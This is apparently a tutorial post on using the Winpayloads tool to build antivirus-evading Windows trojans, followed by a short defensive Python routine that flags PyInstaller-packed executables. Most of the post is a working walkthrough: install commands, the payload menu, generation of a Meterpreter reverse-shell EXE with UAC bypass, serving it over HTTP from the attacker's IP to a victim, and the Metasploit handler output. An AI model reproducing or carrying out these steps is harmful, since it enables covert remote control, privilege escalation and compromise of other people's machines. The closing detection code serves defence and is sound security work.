Building AV-evading Windows trojans (Winpayloads)

Tool link

https://github.com/nccgroup/Winpayloads

Introduction

Winpayloads is a tool for building Windows trojans that evade antivirus detection.

Installation

Download:
git clone https://github.com/nccgroup/Winpayloads.git
cd Winpayloads

Install:
chmod +x setup.sh
./setup.sh

What it looks like when started after installation:

_ ___ ____ __ __
| | / (_)___ / __ \____ ___ __/ /___ ____ _____/ /____
| | /| / / / __ \/ /_/ / __ `/ / / / / __ \/ __ `/ __ / ___/
| |/ |/ / / / / / ____/ /_/ / /_/ / / /_/ / /_/ / /_/ (__ )
|__/|__/_/_/ /_/_/ \__,_/\__, /_/\____/\__,_/\__,_/____/
/____/NCCGroup - CharlieDean
===================================================================================================================================Main Menu==================================================================================================================================
1: Windows Reverse Shell
2: Windows Meterpreter Reverse Shell [uacbypass, persistence, allchecks]
3: Windows Meterpreter Bind Shell [uacbypass, persistence, allchecks]
4: Windows Meterpreter Reverse HTTPS [uacbypass, persistence, allchecks]
5: Windows Meterpreter Reverse Dns [uacbypass, persistence, allchecks]
ps: PowerShell Menu
stager: Powershell Interpreter Stager
clients: Connected Interpreter Clients

?: Print Detailed Help
back: Main Menu
exit: Exit
==============================================================================================================================================================================================================================================================================
Main Menu >

Usage

For example, to generate a Windows Meterpreter Reverse Shell:

Main Menu > 2

[*] Press Enter For Default Port(4444)
[*] Port> 4444

[*] Press Enter To Get Local Ip Automatically(1.1.1.16)
[*] IP>
[*] IP SET AS 1.1.1.16
[*] PORT SET AS 4444

[*] Try UAC Bypass(Only Works For Local Admin Account)? y/[n]:y
[*] Creating Payload using Pyinstaller...
- Genera
[*] Payload.exe Has Been Generated And Is Located Here: /root/winpayloads/Windows_Meterpreter_Reverse_Shell.exe

[*] Upload To Local Websever or (p)sexec? [y]/p/n: y

[*] Serving Payload On http://1.1.1.16:8000/Windows_Meterpreter_Reverse_Shell.exe

_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\


=[ metasploit v4.14.27-dev ]
+ -- --=[ 1659 exploits - 951 auxiliary - 293 post ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

payload => windows/meterpreter/reverse_tcp
LPORT => 4444
LHOST => 0.0.0.0
autorunscript => multi_console_command -rc uacbypass.rc
ExitOnSession => false
[*] Exploit running as background job.

[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Starting the payload handler...
msf exploit(handler) >

On the victim machine, open http://1.1.1.16:8000/Windows_Meterpreter_Reverse_Shell.exe and run it.

Evaluation

In practice it cannot achieve complete AV evasion, probably because the tool has been around for so long, but the way it generates trojans is quite simple and worth a try.
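As an added defender-side check (not part of the original post and not Winpayloads code), the following Python triages a file for the PyInstaller archive cookie, since the run above shows the payload being created with Pyinstaller; it assumes PyInstaller's 2.1+ 88-byte cookie layout, and the sample bytes are constructed rather than taken from a real binary.

```python
import struct
from typing import Optional

# Magic at the start of PyInstaller's CArchive cookie (the trailer of the
# appended archive). Winpayloads builds its EXE with Pyinstaller, so this
# cookie is a quick, AV-independent hint that a sample is such a bundle.
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"

# PyInstaller 2.1+ cookie (big-endian): magic, package length, TOC offset,
# TOC length, Python version, 64-byte Python library name = 88 bytes.
COOKIE_FORMAT = "!8sIIii64s"
COOKIE_SIZE = struct.calcsize(COOKIE_FORMAT)


def find_pyinstaller_cookie(data: bytes) -> Optional[dict]:
    """Return the parsed cookie if data holds a PyInstaller archive, else None.

    The magic is searched for instead of read from a fixed offset because
    data such as an Authenticode signature may follow the archive.
    """
    pos = data.rfind(PYINSTALLER_MAGIC)
    if pos == -1 or pos + COOKIE_SIZE > len(data):
        return None
    _, pkg_len, toc_pos, toc_len, pyver, pylib = struct.unpack(
        COOKIE_FORMAT, data[pos:pos + COOKIE_SIZE])
    # Plausibility check: the TOC must lie inside the package and the package
    # inside the file, otherwise the magic occurred by coincidence.
    if not (0 < toc_len and toc_pos + toc_len <= pkg_len <= len(data)):
        return None
    return {
        "package_len": pkg_len,
        "toc_pos": toc_pos,
        "toc_len": toc_len,
        "python_version": pyver,  # as PyInstaller encodes it, e.g. 27 for 2.7
        "pylib": pylib.rstrip(b"\x00").decode("ascii", "replace"),
    }


def build_sample() -> bytes:
    """Constructed sample, not a real binary: a stub plus a fake archive."""
    stub = b"MZ" + b"\x00" * 62          # stands in for the bootloader PE
    members = b"\xaa" * 100              # stands in for the archived files
    toc = b"\x00" * 16                   # stands in for the table of contents
    pkg_len = len(members) + len(toc) + COOKIE_SIZE
    cookie = struct.pack(COOKIE_FORMAT, PYINSTALLER_MAGIC, pkg_len,
                         len(members), len(toc), 27,
                         b"python27.dll".ljust(64, b"\x00"))
    return stub + members + toc + cookie
```

A hit only says the file is a PyInstaller bundle, which is common for legitimate software too; it narrows triage rather than proving malice.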
